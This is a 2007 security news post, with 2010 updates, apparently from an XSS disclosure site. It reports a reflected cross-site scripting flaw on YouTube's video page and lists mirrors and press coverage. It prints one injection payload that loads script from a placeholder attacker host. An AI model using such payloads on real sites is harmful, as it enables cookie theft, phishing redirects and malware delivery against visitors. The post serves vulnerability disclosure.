YouTube XSS celebrates one month of age

Written by DP

Thursday, 6 December 2007

YouTube is currently number 4 of the most visited websites on the planet according to Alexa. With more than 100 million video views every day, visitors are at great risk due to a serious cross-site scripting vulnerability, from which YouTube suffers for a month already. It is a query string XSS that appears in the video viewing page. Works only with IE and probably Konqueror. Malicious people can use it to spread malware, steal cookie based authentication credentials and redirect unaware users to phishing scam pages.

The following vector works successfully:
"><script/src=http://attacker/malware.js>

Mirrors of YouTube XSS vulnerabilities:
http://www.xssed.com/mirror/25330/ - Worked since 07/11/07 until fixed on 21/12/2007
http://www.xssed.com/mirror/7109/ - Fixed
http://www.xssed.com/mirror/5681/ - Fixed
http://www.xssed.com/mirror/197/ - Fixed

Please YouTube resolve this issue! I do not want malicious people to steal the cookies of my grandmother watching "The Joy of Painting" by Bob Ross! :)

Related News on XSSed:

"YouTube persistent XSS vulnerability" - 5 July 2010 - DP

Related News about YouTube XSS attacks worth reading (Updated *6 July 2010* 11:45pm):

"Youtube HTML Code Injection" - 3 July 2010 - TinKode - InSecurityRomania (ISR)
"YouTube XSS Vulnerability Fixed [Official Statement]" - 4 July 2010 - Pallab De - Techie-Buzz.com

"Stored XSS vulnerability on YouTube actively abused?" - 4 July 2010 - Bojan Zdrnja - SANS Internet Storm Center

"Dangerous XSS Bug Found on YouTube" - 5 July 2010 - Lucian Constantin - SoftPedia (Only this news article credits TinKode)
"YouTube vuln pwns Justin Bieber fans" - 5 July 2010 - John Leyden - The Register
"Dangerous XSS vulnerability found on YouTube – the vulnerability explained" - 6 July 2010 - Jeremy Pullicino - Acunetix